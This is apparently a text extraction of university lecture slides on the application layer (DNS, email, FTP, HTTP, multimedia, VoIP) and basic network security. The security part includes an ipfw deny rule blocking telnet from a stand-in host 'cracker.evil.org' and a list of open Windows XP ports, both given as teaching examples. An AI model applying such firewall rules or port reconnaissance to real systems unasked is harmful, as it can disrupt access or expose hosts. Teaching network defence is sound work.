Wolkite University Information Technology

Collage of Computing & Informatics Information System

Computer Science
Software Engineering

Data Communication and Computer Networks

Wendosen Z & Amare M

The Application Layer & Security

1
 the Application Layer:
 receives services from the transport layer and provides
services to users (humans or software)
 provides user interfaces and support services such as
email, remote file access and transfer, access to the
WWW
 three general issues related to the application layer: the
client-server paradigm, addressing, and services

2
8.1 The Client-Server Model
 to do a task, there must be a client and a server
 a computer runs a program to either request a service from
another computer (client) or to provide a service to another
computer (server)
 communication takes the form of the client process sending
a message to the server process and then waiting for a reply

 a client program runs when needed, but the server program

runs all the time
 Socket Interface: a set of system calls for communication
between clients and servers

3
8.2 Addressing
 a client and a server communicate with each other using
addresses
 addressing mechanism in the application layer is different
from the ones in other layers
 email address: [email protected]
 Web page (host name): http://www.ju.edu.et
 these are aliases convenient for human beings; they must
be mapped to IP addresses
 an application program needs the services of another
program for this; this application program is called DNS -
Domain Name System
 it uses port 53
 it is not directly used by the user; but by application
programs to perform the mapping

4
 originally (when Internet was small), mapping was done
using a host file with two columns stored on every host
 impossible nowadays
 the host file is too large
 updating all the host files in the world every time there is
a change is difficult
 DNS
 a hierarchical, domain-based naming scheme and a
distributed database system for implementing the naming
scheme
 used for mapping host names and email addresses to IP
addresses

5
 Name Space
 names assigned to machines must be carefully selected
from a name space; names must be unique (as are
addresses)
 a name space can be organized in two ways
 Flat Name Space
 a name is a sequence of characters without structure;
like human names? may be
 difficult to be used in a large system since it must be
centrally controlled to avoid duplication
 Hierarchical Name Space
 each name is made of several parts; the first may define
the nature of the organization, the second the name, the
third departments, ...
 the authority to assign and control the name spaces can
be decentralized where a central authority assigns only
the first two parts

6
 The DNS Name Space
 hierarchical, defined in an inverted tree structure with the
root at the top
 the tree can have only 128 levels

 Label
 each node has a label, a string with a maximum of 63
characters
 the root label is null
 children of a node must have different names (to
guarantee uniqueness) 7
 Domain Name
 each node has a domain name
 a full domain name is a sequence of labels separated by
dots (the last character is a dot; null string is nothing)
 case insensitive
 domain names are read from the node up to the root
 full path names must not exceed 255 characters

8
 Fully Qualified Domain Name (FQDN) or Absolute
 terminated by a null string
 contains the full name of a host, e.g., cs.aau.edu.et.
 Partially Qualified Domain Name (PQDN) or Relative
 not terminated with a null string
 it starts from a node but does not reach the root
 used when the name to be resolved belongs to the same
site as the client (the resolver supplies the missing part,
called the suffix to create an FQDN)

9
 Domain
 a domain is a subtree of the domain name space
 the name of the domain is the domain name of the node at
the top of the subtree

 the Internet is divided into over 200 top-level domains;

each partitioned into subdomains, ... ; the leaves represent
domains that have no subdomains; a leaf domain may
contain a single host or represent a company and contain
thousands of hosts

10
 Hierarchy of Name Servers
 storing the information contained in the domain name space
in a single computer is inefficient and unreliable
 distribute the information among many computers called
DNS servers
 there is a hierarchy of name servers as we have a hierarchy
of names

11
 Zone
 what a server is responsible for, or has authority over, is
called a zone; zones are nonoverlapping
 the server makes a database called a zone file and keeps
all the information for every node under that domain
 it can divide its domain into subdomains and delegate part
of its authority to other servers

12
 Root Server
 a server whose zone consists of the whole tree
 it usually does not store the whole information about
domains but delegates its authority to other servers and
keeps references to those servers
 there are currently more than 13 root servers , each
covering the whole domain name space and distributed all
around the world
 Primary and Secondary Servers
 a primary server is one that stores a file about the zone for
which it is an authority; it is responsible for creating,
maintaining, and updating the zone file
 a secondary server is one that transfers the complete
information about a zone from another server (primary or
secondary); it does not create or update the file
 such arrangement is to create a redundancy so that if one
server fails, the other can still serve clients
13
 Types of Top-Level Domains
 two types: generic domains and country domains; there is a
third one called Inverse Domain (used to map an address to
a name; we will not discuss it further)
 Generic Domains
 define registered hosts according to their generic
behaviour

Label Description
com Commercial organizations
edu Educational institutions
gov Government institutions
int International organizations
mil Military groups
net Network support centers
org Nonprofit organizations

14
  newly introduced first-level domains
Label Description
aero Airlines and aerospace companies
biz Businesses or firms (similar to com)
coop Cooperative business organizations
info Information service providers
museum Museums and other nonprofit organizations
name Personal names (individuals)
pro Professional individual organizations

 Country Domains
 include one entry for every
country (as defined by ISO) -
two character abbreviations

15
 Resolution
 mapping a name to an address or an address to a name is
called name-address resolution
 Resolver
 a host that needs to map an address to a name or a name
to an address calls a DNS client named a resolver
 the resolver accesses the closest DNS server with a
mapping request
 if the server has the information it satisfies the resolver;
otherwise, it either refers the resolver to other servers
(called Iterative Resolution) or asks other servers to
provide the information (called Recursive Resolution)

16
Iterative resolution Recursive resolution

17
8.3 Application Layer Services
 electronic mail (SMTP, MIME, POP3, IMAP, Webmail)
 file transfer (FTP - File Transfer Protocol)
 HTTP - Hypertext Transfer Protocol for accessing data on
the WWW
 WWW
 Multimedia

18
1. Electronic Mail
 what is email? a message that includes text, voice, video, or
graphics and sent to one or more recipients
 an email has an envelope and a message (similar to paper
mail - snail mail)

19
 the envelope contains the sender’s address, the receiver’s
address, and other information such as priority; information
used for routing or transporting the email
 the message part consists of a header (information for the
system) and a body (the actual information for the human
recipient); envelope fields and header fields confused in RFC
822 (Request for Comment)

RFC 822 header fields

20
Example from my Gmail
Example from my JU Mail
 many email systems exist; examples are Outlook, Eudora,
Netscape, …
 email systems consist of two subsystems: User Agent (UA)
and Message Transfer Agent (MTA)

User User

SMTP SMTP
UA MTA MTA MTA UA

23
i. User Agent
 a user agent is a software that
 composes messages (by providing a template on the
screen, some have built-in editors with more functionalities
- spell and grammar checking, etc., one can also use any
other editor)
 reads incoming messages (checks incoming mails in the
mailbox, shows an on-line summary of each received mail -
sender, size, date, flag fields, ...)
 replies to messages (to the original sender or to all
recipients)
 forwards messages (to a third party)
 handling mailboxes (inbox and outbox)
 a user agent can be command-driven or GUI-based 24
ii. Message Transfer Agent
 relays messages from the sender to the receiver
 it is a daemon running in the background
 to send mail, a system must have a client MTA; and to
receive mail, a system must have a server MTA
 in the Internet, message transfer is done through a protocol
(and software) named SMTP (Simple Mail Transfer Protocol);
there were other protocols but failed, e.g. the X.400
recommendation by CCITT
 SMTP uses port 25
 SMTP uses commands and responses to transfer messages
between an MTA client and an MTA server

25
 originally, emails consisted of 7-bit ASCII text
 problems
 can not be used for languages that are not supported by 7-
bit ASCII characters (French, German, Hebrew, ...)
 can not be used to send binary files, video or audio
 MIME - Multipurpose Internet Mail Extensions
 MIME is a supplemental protocol that allows non-ASCII
data to be sent using the existing mail programs and
protocols; only the sending and receiving programs need
to be changed
 it transforms non-ASCII data at the sender site to ASCII
and back to non-ASCII at the receiving site

26
 MIME defines five headers that can be added to the original
SMTP header to define the transformation parameters

 MIME-Version: the current version is 1.1

 Content-Id: uniquely identifies the whole message in a
multiple-message environment
 Content-Description: defines whether the body is image,
audio, or video
 Content-Type: the type of data used in the body of the
message

27
  Data types and subtypes
Type Subtype Description
Text Plain Unformatted text; no transformation needed
Mixed Body contains ordered parts of different data types
Parallel Same as above, but no order
Multipart
Digest Similar to mixed, but the default is message/RFC822
Alternative Parts are different versions of the same message
RFC822 Body is an encapsulated message
Message Partial Body is a fragment of a bigger message
Ext. Body Body is a reference to another message
JPEG Image is in JPEG
Image
GIF Image is in GIF format
Video MPEG Video is in MPEG format
Audio Basic Audible sound
PostScript Adobe PostScript printable document
Application Octet-
Stream General binary data (8-bit bytes)
28
 Mail Delivery
 mail delivery consists of three stages

29
 Mail Access Protocols
 the first and second stages of mail delivery use SMTP
 SMTP is not involved in the third stage since SMTP is a push
protocol; it pushes the message from the sender to the
receiver
 the operation of SMTP starts with the sender, not the receiver
 but the third stage needs a pull protocol; the operation must
start with the recipient; mail access protocols required
 there are two mail access protocols: POP3 and IMAP
 POP3 - Post Office Protocol, version 3
 the client POP3 software is installed on the recipient
machine; the server POP3 software is installed on the mail
server

30
 after establishing a TCP connection at port 110, the POP3
protocol goes through three stages
 authorization: for the user to login
 transactions: reading emails, marking them for
deletion, ...
 update: committing deletions

31
 IMAP - Internet Mail Access Protocol
 POP3 assumes that each time a client accesses the server,
the whole mailbox will be cleared (transferred); not
desirable if people access their mailboxes from different
places such as a cybercafe
 IMAP is similar to POP3 but with the following additional
features
 a user can check the email header prior to downloading
 a user can search the contents of the email for a specific
string
 a user can partially download an email; like without
attachments
 a user can create, delete, or rename mailboxes on the
mail server (POP3 can do this only on the local machine)
 a user can create a hierarchy of mailboxes in a folder for
email storage
 it uses port 143
32
 comparison of POP3 and IMAP

33
 Web-Based Mail
 some websites provide email service to anyone
 examples are Yahoo and Hotmail
 mail transfer from the user to to the mail server and from
the receiving server (the web server) to the user’s browser
is through HTTP
 a TCP connection is still created using SMTP at port 25
before mail transfer begins
 authentication is done by filling a form
 other features provided by many systems independently of
POP3 or IMAP
 spam filtering
 to temporarily forward an incoming mail to a different
address
 a vacation daemon; Thanks I am on a vacation and will
reply as soon as I am back.

34
2. FTP - File Transfer Protocol
 a standard mechanism provided by the Internet for copying
a file from one host to another
 some heterogeneity problems solved by FTP: two systems
may
 use different file name conventions
 have different ways to represent text and data
 have different directory structures
 FTP establishes two connections between the client and
the server (different from other client-server applications);
one is used for data transfer, the other for control
information (commands and responses)
 FTP uses the services of TCP; it needs two TCP
connections; the well-known port 21 is used for the control
connection, and the well-known port 20 is used for the data
connection

35
 the client has three components and the server has two

 the control connection is maintained during the entire

interactive FTP session; the data connection is opened and
then closed for each file transferred

36
 two different approaches of communication; one each for
control connection and for data transfer
 Communication over Control Connection
 uses same approach as SMTP - the ASCII character set
 communication is achieved through commands and
responses
 each command or response is one short line (no worry
about file format or structure)

37
 Communication over Data Connection
 to solve the heterogeneity problem, the client must
define the type of file to be transferred, the structure of
the data, and the transmission mode

38
 File Type: FTP can transfer one of the following file types
 ASCII file: default format; the sender transforms from its own
representation to ASCII and the receiver transforms from ASCII
to its own representation
 EBCDIC file: if one or both ends of the connection use EBCDIC
encoding, the file can be transferred using EBCDIC encoding
 Image file: the default format for transferring binary files; the file
is sent as continuous streams of bits without any interpretation
or encoding
 Data Structure: one of the following interpretations about the
structure of the data can be used
 File Structure: default mode; the file has no structure; it is a
continuous stream of bytes
 Record Structure: the file is divided into records (or structs in
C); can be used only with text files
 Page Structure: the file is divided into pages, with each page
having a page number and a page header; the pages can be
stored or accessed randomly or sequentially

39
 Transmission Mode: it can use one of the following
transmission modes
 Stream mode: default mode; data are delivered from FTP to
TCP as a continuous stream of bytes; TCP is responsible for
chopping data into segments of appropriate size
 Block Mode: each block is preceded by a 3-byte header; the
first byte is called the block descriptor; the next 2 bytes
define the size of the block in bytes
 Compressed Mode: if the file is big, the data can be
compressed normally using run-length encoding where
consecutive appearances of a data unit are replaced by one
occurrence and the number of repetitions
 User Interface
 most operating systems provide a user interface to access
the services of FTP
 the interface prompts the user for the appropriate input; then
it is changed to the corresponding FTP command

40
 e.g. the user input is shown in blue; some of the commands are
provided automatically by the interface; the user receives a
prompt and provides only the arguments
$ ftp networking.cs.ju.edu.et
Connected to networking.cs.ju.edu.et
220 Server ready
Name: mulugeta
Password: *******
ftp > ls /usr/user/report
200 OK
150 Opening ASCII mode
...........
...........
226 transfer complete
ftp > close
221 Goodbye
ftp > quit

41
 Anonymous FTP
 to use FTP, a user needs a user name and a password on the
remote server
 some sites have a set of files accessible for the public
without the need to have a user name and a password
 the user can use anonymous as a user name and guest as a
password

42
3. HTTP - Hypertext Transfer Protocol
 a file transfer protocol specifically designed to facilitate
access to the WWW
 it transfers data in the form of plain text, hypertext, audio,
video, ...
 designed for an environment where there are rapid jumps
from one document to another
 similar to FTP (but only one TCP connection on well-known
port 80) and SMTP (but differs on how messages are sent
from the client to the server and from the server to the
client)
 two kinds of messages: request and response

43
 Request Messages
 consists of a request line, headers, and
sometimes a body
 the request line defines the request
type, resource (URL), and HTTP version
(currently 1.1)

 URL: a standard for specifying any kind of information on

the Internet; it defines 4 things:

44
e.g., http://www.aaustudents.com/hobbies.html
 method: the protocol used to retrieve a document (ftp,
http, ...)

 host computer: the computer where the information is

located; usually an alias name that begins with the
characters www
 port (optional): the port number of the server
 path: of the file where the information is located

45
 request type or method: defines several kinds of messages;
commands or requests a client issues to the server
 GET: to retrieve a document
 HEAD: when a client wants some information about the
document (its header) but not the document itself
 POST: to provide some input to the server - appending a new
data such as posting a message to a newsgroup or adding a
file to a bulletin board
 PUT: to provide a new or replacement document to the server
- authentication required
 PATCH: similar to PUT but the request contains a list of
differences that should be implemented in the existing file
 MOVE: to move a file to another location
 DELETE: removes a page from a server - authentication
required
 LINK: create a link or links from a document to another
location
 UNLINK delete a link
 OPTION: to ask a server about available options

46
 Response Message
 consists of a status line, headers, and
sometimes a body
 status line

 HTTP version: same as above

 Status code: a three digit number specifying the status
of a command; the first digit is used to divide the
responses into 5 major groups
 Status phrase: status code in text form

47
 Headers (for both types of messages)
 to exchange additional information
 e.g., the client can request a document to be sent in a
special format
 each header line consists of a header name, and a header
value

48
49
 a header line belongs to one of 4 categories: general header,
request header, response header, and entity header

 General Header: gives general information about the message

 Request Header: specifies the client’s configuration and
preferred document format
 Response Header: specifies the server’s configuration and
special information about the request
 Entity Header: information about the body of the document
50
 example 1
 request message
 to retrieve an image
using the GET
command with the
path
/usr/bin/image1
 the request line
shows the method,
the URL, and the
HTTP version
 two header lines: the client specifying that it can accept
images in GIF and JPEG formats
 has no body
 response message
 contains the status line and four lines of header
 the header lines define the date, server, MIME version, and
length of the document
 the body of the document follows the header
51
 example 2
 request message
 to retrieve information
about an HTML
document using the
HEAD command
 the request line
shows the method,
URL, and HTTP
version

 the header is one line showing that the client can accept the
document in any format (wild card)
 has no body
 response message
 contains the status line and five lines of header
 the header lines define the date, server, MIME version, type of
document, and length of the document
 has no body
52
 Proxy Server
 HTTP supports proxy servers
 a computer that keeps copies of responses to recent
requests
 the HTTP client sends a request to the proxy server
 the proxy server checks its cache; if the response is not
stored in the cache, it sends the request to the
corresponding server
 the proxy server reduces the load on the original server,
decreases traffic, and improves latency

53
4. WWW
 a repository of information spread all over the world and linked
together; strings of text within a page that link to other
documents are called hyperlinks
 it was initiated by CERN to create a system to handle
distributed resources for scientific research (initial proposal by
Tim Berners-Lee); W3C was formed in 1994 to further develop
the Web (standardizing protocols and encouraging
interoperability between sites) see www.w3.org
 WWW is a client-server service distributed over many locations
called websites

54
 Hypertext and Hypermedia
 hypertext: information is stored in a set of documents that
are linked using the concept of pointers; such documents
contain only text

 hypermedia: documents can contain pictures, graphics,

and sound
 a unit of hypertext or hypermedia available on the Web is
called a page; the main page for an organization or an
individual is known as a homepage; a page is viewed with a
program called a browser
55
 Browser Architecture
 a lot of them exist, but all use nearly the same architecture
 each consists of three parts: a controller, client programs,
and interpreters
 the controller receives input from the user and uses the
client programs to access the document; after accessing
the document, the controller uses one of the interpreters to
display the document on the screen; the client programs
can be one of the protocols such as HTTP, FTP, or SMTP;
the interpreter can be HTML or Java (when Applets are
used)

56
 Web documents can be grouped into 3 broad categories: static,
dynamic, and active
 Static Documents
 fixed-content documents created and stored in a server
 the contents of the file are determined when the file is created,
not when it is used; can be changed, but not by the user
 HTML - Hypertext Markup Language
 a language for creating Web pages (that include text, graphics,
and pointers to other Web pages)
 a markup language allows to embed formatting instructions in
the file itself and stored with the text (other markup languages:
TeX and troff)
 HTML lets us use only ASCII characters for both the main text
and formatting instructions (unlike WYSIWYG word processing
programs); the later ones are called tags (enclosed in < and >
and usually come in pairs)
 other mark up languages: XML (eXtensible Markup Language),
XSL (eXtensible Style Language), XHTML (eXtended HTML)

57
 Dynamic Documents
 do not exist in a predefined format; instead a dynamic
document is created by a Web server whenever a browser
requests the document, for example, by filling a form
 the server runs an application program (or a script); the
output of the program is sent to the user

 CGI - Common Gateway Interface

 a technology that creates and handles dynamic documents
 it is a set of standards that defines how a dynamic document
should be written, how input data should be supplied to the
program, and how the output result should be used
 it is not a new language; instead it allows programmers to use
any of several languages such as C, C++, Borne or C Shell,
Perl, ... by defining a set of rules and terms that the
programmer should follow 58
 a link for a dynamic document has the form:
www.abc.com/cgi-bin/abc.perl
 other scripting languages include the following
 PHP - Hypertext Processor
 to embed little scripts inside HTML pages
 www.abc.com/abc.php
 JSP - JavaServer Pages
 similar to PHP but the dynamic part is written in Java
 www.abc.com/abc.jsp
 ASP - Active Server Pages
 Microsoft’s version of PHP and JSP
 it uses Visual Basic Script - Microsoft’s proprietary
scripting language - for the dynamic part
 www.abc.com/abc.asp

59
  JavaScript
 a full-blown high-level programming language
 used when the interaction is with the user at the client
computer for designing interactive Web pages (e.g., to
track mouse motion - so that something happens when
the mouse is moved over some image or text; the image
changes or a menu appears)
 Active Documents
 for many applications, we need a program to be run at the
client site; for example, to create animated graphics on the
screen
 these are called active documents

60
  an active document is sent by a server in the form of byte
code; the document is then run at the client (browser) site
 Applets
 small Java programs that have been compiled into
machine instructions for a virtual computer - JVM - Java
Virtual Machine
 since they are interpreted, the Java interpreter can
prevent them from doing illegal things (at least in theory)
 ActiveX controls
 Microsoft’s version for Sun’s Java applets
 they are programs compiled to Pentium machine
language and executed by the bare hardware
 they are downloaded and executed by the browser (IE) -
security issue
 Read about the wireless Web - for small portable devices
 WAP - The Wireless Application Protocol
 i-Mode - information mode
61
5. Multimedia
 two or more media (is a book multimedia?)
 the combination of text, graphics, images, video and audio
used together; at least one must be continuous (time-
dependent like audio, video, animation)
 sometimes pure audio (or video) is referred to as multimedia
 Multimedia System
 the integrated production, processing, storage,
representation, and transmission of several time-
dependent and time-independent media streams
 Audio (sound) wave
 an audio (sound) wave is a one-dimensional acoustic
(pressure) wave
 causes vibration in the eardrum or in a microphone
 frequency range of human ear: 20 –20,000 Hz (20 KHz)
 audio waves can be converted to digital form by an ADC -
Analog Digital Converter

62
 Analog Digital Conversion (ADC)
 Sampling: of the audio wave in every ∆T secs
 Quantization
 precision of the digital sample depends on the number of
bits
 quantization noise: error due to finite number of
bits/sample
 audio encoding - example

a) a sine wave b) sampling the sine wave c) quantizing the samples to 4

bits

63
 audio encoding - standards
 telephone
 8,000 samples/sec (up to 4 KHz)
 Needs 64 Kbps (Pulse Code Modulation - PCM, 8-bit
samples in Europe), or 56 Kbps (USA, Japan – 7 bits)
 audio CDs
 44,100 samples/sec (up to 20 KHz)
 16-bit samples: quantization error is small but audible
 needs 705.6 Kbps (44100x16) for mono, 1.411 Mbps for
stereo
 MP3 (MPEG-1 audio layer 3) compression
 based on psycho acoustic models (128 Kbps)

64
 Analog Video - Basics
 sequence of images flashing faster than 50/sec
 makes the impression of a continuous movie
 TV (black-and-white)
 an electron beam scans the image rapidly
 from left to right and from top to bottom
 at the end of the scan (a frame) the scan retraces
 NTSC scans 525 lines (483 effective), 30 frames/sec
 PAL and SECAM: 625 lines (576), 25 frames/sec
 in both, the top few and the bottom few lines are not
displayed - to approximate a rectangular image on the
original round CRTs
 25 frames/s produce smooth motion, but flicker
 Interlacing solves this; 50 half frames (fields) / sec
 Non interlaced: progressive scanning

65
66
 Analog Video – color
 3 beams moving in unison for the 3 additive primary colors –
Red, Green, Blue (RGB)
 Digital Video
 a digital video is a sequence of frames (25 or 30 frames per
second), each consisting of a rectangular grid of picture
elements, or pixels
 each pixel can be
 1 bit - black and white
 8 bits - to represent 256 gray labels (high-quality black
and white video)
 24 bits for color - 16 million colors (more than enough); 8
bits each for R, G, and B

67
 Smoothness vs. flickering
 Smoothness: number of different images per second (>
25/s)
 Flicker: number of refresh of the display per second (>
70/s)
 good computer monitors rescan with > 70Hz
 the image is repainted from RAM – no interlace
 Common configurations (4:3 aspect ratio)
 VGA (640*480), SVGA (800*600), XGA (1024*768)
 XGA needs 472 Mbps (at 25 frame/s) - 1024*768*24*25;
this requires a high-data rate technology such as SONET

68
 Compression
 storing or transmitting uncompressed video/audio requires
huge resources (disk space and bandwidth)
 compression is required to send data over the Internet
 many compression algorithms designed for both audio and
video
 two algorithms required: encoding by the source and
decoding by the destination (details out of scope)

69
 Audio and video Services
 three major services: streaming stored audio/video,
streaming live audio/video, and real-time interactive
audio/video
i. Streaming stored audio/video
 streaming means a user can listen (or watch) the file after
the downloading has started
 the files are compressed and stored on a server
 examples are songs, famous lectures, movies, TV shows,
video clips, ...
 such a service is usually called on-demand audio/video
(VoD) - similar to a rental store
 communication is often unicast and on-demand
 there are different approaches

70
a. Using a Web Server
 download a compressed audio/video file as text file
 the client can use the services of HTTP and then use a media
player to play the file
 simple and does not involve streaming

1. Establish TCP connection,

Send HTTP GET request
2. Server gets file from disk,
File sent back
3. Browser writes file to disk,
Media player fetches file
block by block and plays it

 drawbacks
 downloading takes time; delay latency
 downloading may not be acceptable by the owners; hence
usually stored on a scratch file

71
b. Using a Web Server with Metafile
 the media player is directly connected to the Web server
 the Web server stores two files: the actual audio/video file and a
metafile that holds information about the audio/video file
 the media player gets the URL of the audio/video file from the
metafile to contact the Web server
1. Establish TCP connection,
Send HTTP GET request
2. Web server sends metafile
3. Metafile passed to media player
4. Media player uses URL to access
the Web server
5. Web server responds

 drawbacks
 both the browser and the media player use the services of HTTP
designed to run over TCP; this is ok for getting the metafile, but
not for getting the audio/video file
 TCP retransmits a lost or damaged segment; not acceptable in
72
streaming; we need to use UDP
c. Using a Media Server
 since HTTP which accesses the Web server and the Web
server itself are designed for TCP, we need another server, a
media server
 in this approach, only the media player accesses the media
server and can use any protocol

1. Establish TCP connection,

Send HTTP GET request
2. Web server sends metafile
3. Metafile passed to media player
4. Media player uses URL to access
the Media server; downloading
can take place by any protocol
that uses UDP
5. Media server responds

73
d. Using a Media Server and RTSP
 RTSP - Real-Time Streaming Protocol - is designed to add
some functionalities to the streaming process
 the media player can send other messages: PAUSE, PLAY, ...

1. Establish TCP connection,

Send HTTP GET request
2. Web server sends metafile
3. Metafile passed to media player
4. Media player sends a SETUP
message to create connection with the
media server
5. Media server responds
6. Media player sends a PLAY message
to start playing
7. File is downloaded using a protocol
that runs over UDP
8. Connection is broken using the
TEARDOWN message
9. Media server responds
74
ii. Streaming live audio/video
 the broadcasting of radio and TV programs through the
Internet
 communication is multicast and live
 live streaming is better suited to the multicast services of IP
and the use of protocols such as UDP and RTP
iii. Real-time interactive audio/video
 the use of the Internet for people to interactively
communicate with one another
 examples are Internet telephony or voice over IP and
Internet videoconferencing; two way communication
required

75
 Characteristics of Real-Time Data
 Time Relationship
 real-time data require the preservation of the time
relationship between packets
 when there is delay between packets, jitter is introduced
 Timestamp
 to inform the receiver when each packet is to be played
 by separating the arrival time from the playback time,
jitter can be prevented
 Playback Buffer
 to store data until they are played back
 Ordering
 a sequence number for each packet is required
 a timestamp alone can not inform the receiver if a packet
is lost
 example: suppose the timestamps are 0, 10, and 20; if
the second packet is lost, the receiver does not know
only with timestamps 76
 Multicasting
 for audio and video conferencing and similar applications
 Mixing
 mixing means combining several streams of traffic into one
traffic
 if there is more than one source sending data at the same
time
 Support from Transport Layer Protocol
 TCP is not suitable for interactive multimedia traffic
because we can not allow retransmission of packets
 UDP is more suitable for interactive multimedia traffic; it
supports multicasting and has no retransmission strategy;
however, UDP has no provision for timestamping,
sequencing, or mixing
 UDP is used in conjunction with a new transport protocol -
RTP

77
 RTP - Real-Time Transport Protocol
 the protocol designed to handle real-time traffic on the
Internet
 it is used in conjunction with UDP since RTP has no delivery
mechanisms (multicasting, port numbers, ...)
 it stands between UDP and the application program

 its major contributions are timestamping, sequencing, and

mixing facilities

78
  RTP allows only messages that hold data
 we need other control messages to control the flow and
quality of data and allow the recipient to send feedback to
the source
 the RTCP - Real-Time Transport Control Protocol - was
designed for this purpose
 Some application examples
 Internet Radio
 it is gaining popularity nowadays
 two approaches
1. programs are prerecorded and stored on disk; listeners
can connect to the radio station’s archives; similar to
streaming stored audio/video; it is also possible to store
each program just after it is broadcast live and running
some minutes or hours later; e.g., BBC
2. live broadcast over the Internet, may be simultaneously
with air transmission; same as streaming live
audio/video
79
 Voice over IP (Internet Telephony)
 idea: use the Internet as a telephone network
 instead of communicating over a circuit-switched network,
it allows communication between two parties over the
packet-switched Internet
 two protocols have been designed to handle this type of
communication: SIP and H.323
 H.323
 a standard by ITU to allow telephones on the public
telephone network to talk to computers connected to the
Internet

80
 H.323 architecture

 Gateway: connects the Internet to the telephone network; it

transforms a telephone network message to an Internet
message
 communicating devices are called terminals
 Gatekeeper: registers users on a LAN and knows the IP
addresses under its jurisdiction, called a zone
 H.323 is more of an architectural overview of Internet
telephony rather than a specific protocol; it references (uses)
a large number of specific protocols to establish and maintain
communication (for speech coding, call setup, signaling, data
transport, ...) 81
 G.711 (it is PCM - for audio encoding) or G.723.1: for compression
 H.245: allows the parties to negotiate the compression method;
since multiple compression algorithms are required; also used to
negotiate other aspects such as the bit rate
 Q.931: to establish and terminate connections (providing dial
tones, making ringing sounds, ...)
 H.225 (also called RAS - Registration/Administration/Status): for
registration with the gatekeeper; to join and leave the zone;
bandwidth allocation for QoS
 RTP: for actual data transmission
 RTCP: for the control of the RTP channels
82
 SIP - Session Initiation Protocol
 H.323 is large, complex, and inflexible (may be because it
was not designed by the Internet community!)
 IETF came up with SIP, an application layer protocol that
establishes, manages, and terminates a multimedia
session
 can be used to create two-party, multiparty (everyone can
hear and speak), or multicast sessions (one sender, many
receivers)
 it describes how to setup Internet telephone calls, video
conferences, and other multimedia connections
 it handles only setup, management, and termination of
sessions; other protocols, such as RTP/RTCP, are used for
data transport
 can run on either UDP or TCP
 a text-based protocol like HTTP

83
 uses messages: six types defined, each with a header and
a body
 INVITE: to initialize a session by the caller
 ACK: confirmation by the caller to the callee after the
latter answers
 BYE: terminates the session
 OPTIONS: to query a machine about its capabilities
 CANCEL: to cancel an already started initialization
process
 REGISTER: to make a connection when the callee is not
available; to track down the callee

84
 Addresses: an email address, an IP address, a telephone
number, and other types of addresses can be used to identify
the sender and receiver; but must be in SIP format (also called
scheme)

 A SIP session using SIP consists of three modules:

establishing (a three-way handshake), communicating, and
terminating

85
 Tracking a callee

86
9. Network Security

87
A Brief History of the World

88
Overview
• What is security?
• Why do we need security?
• Who is vulnerable?
• Common security attacks and countermeasures
• Firewalls & Intrusion Detection Systems
• Denial of Service Attacks
• TCP Attacks
• Packet Sniffing
• Social Problems

89
What is “Security”
• Dictionary.com says:
• 1. Freedom from risk or danger; safety.
• 2. Freedom from doubt, anxiety, or fear; confidence.
• 3. Something that gives or assures safety, as:
• 1. A group or department of private guards: Call building security if a visitor acts
suspicious.
• 2. Measures adopted by a government to prevent espionage, sabotage, or attack.
• 3. Measures adopted, as by a business or homeowner, to prevent a crime such as
burglary or assault: Security was lax at the firm's smaller plant.
…etc.

90
What is “Security”
• Dictionary.com says:
• 1. Freedom from risk or danger; safety.
• 2. Freedom from doubt, anxiety, or fear; confidence.
• 3. Something that gives or assures safety, as:
• 1. A group or department of private guards: Call building security if a visitor acts
suspicious.
• 2. Measures adopted by a government to prevent espionage, sabotage, or attack.
• 3. Measures adopted, as by a business or homeowner, to prevent a crime such as
burglary or assault: Security was lax at the firm's smaller plant.
…etc.

91
What is “Security”
• Dictionary.com says:
• 1. Freedom from risk or danger; safety.
• 2. Freedom from doubt, anxiety, or fear; confidence.
• 3. Something that gives or assures safety, as:
• 1. A group or department of private guards: Call building security if a visitor acts
suspicious.
• 2. Measures adopted by a government to prevent espionage, sabotage, or attack.
• 3. Measures adopted, as by a business or homeowner, to prevent a crime such as
burglary or assault: Security was lax at the firm's smaller plant.
…etc.

92
What is “Security”
• Dictionary.com says:
• 1. Freedom from risk or danger; safety.
• 2. Freedom from doubt, anxiety, or fear; confidence.
• 3. Something that gives or assures safety, as:
• 1. A group or department of private guards: Call building security if a visitor acts
suspicious.
• 2. Measures adopted by a government to prevent espionage, sabotage, or attack.
• 3. Measures adopted, as by a business or homeowner, to prevent a crime such as
burglary or assault: Security was lax at the firm's smaller plant.
…etc.

93
Why do we need security?
• Protect vital information while still allowing access to those who need it
• Trade secrets, medical records, etc.
• Provide authentication and access control for resources
• Guarantee availability of resources
• Ex: 5 9’s (99.999% reliability)

94
Who is vulnerable?
• Financial institutions and banks
• Internet service providers
• Pharmaceutical companies
• Government and defense agencies
• Contractors to various government agencies
• Multinational corporations
• ANYONE ON THE NETWORK

95
Common security attacks and their
countermeasures
• Finding a way into the network
• Firewalls
• Exploiting software bugs, buffer overflows
• Intrusion Detection Systems
• Denial of Service
• Ingress filtering, IDS
• TCP hijacking
• IPSec
• Packet sniffing
• Encryption (SSH, SSL, HTTPS)
• Social problems
• Education
96
Firewalls
• Basic problem – many network applications and protocols have
security problems that are fixed over time
• Difficult for users to keep up with changes and keep host secure
• Solution
• Administrators limit access to end hosts by using a firewall
• Firewall is kept up-to-date by administrators

97
Firewalls
• A firewall is like a castle with a drawbridge
• Only one point of access into the network
• This can be good or bad
• Can be hardware or software
• Ex. Some routers come with firewall functionality
• ipfw, ipchains, pf on Unix systems, Windows XP and Mac OS X have built in
firewalls

98
Firewalls

Internet DMZ
Web server, email
server, web proxy,

Firewall

Firewall
etc

Intranet

99
Firewalls
• Used to filter packets based on a combination of features
• These are called packet filtering firewalls
• There are other types too, but they will not be discussed
• Ex. Drop packets with destination port of 23 (Telnet)
• Can use any combination of IP/UDP/TCP header information
• man ipfw on unix47 for much more detail
• But why don’t we just turn Telnet off?

100
Firewalls
• Here is what a computer with a default Windows XP install looks like:
• 135/tcp open loc-srv
• 139/tcp open netbios-ssn
• 445/tcp open microsoft-ds
• 1025/tcp open NFS-or-IIS
• 3389/tcp open ms-term-serv
• 5000/tcp open UPnP

• Might need some of these services, or might not be able to control all
the machines on the network

101
Firewalls
• What does a firewall rule look like?
• Depends on the firewall used
• Example: ipfw
• /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su
telnet
• Other examples: WinXP & Mac OS X have built in and third party
firewalls
• Different graphical user interfaces
• Varying amounts of complexity and power

102
Intrusion Detection
• Used to monitor for “suspicious activity” on a network
• Can protect against known software exploits, like buffer overflows
• Open Source IDS: Snort, www.snort.org

103
Intrusion Detection
• Uses “intrusion signatures”
• Well known patterns of behavior
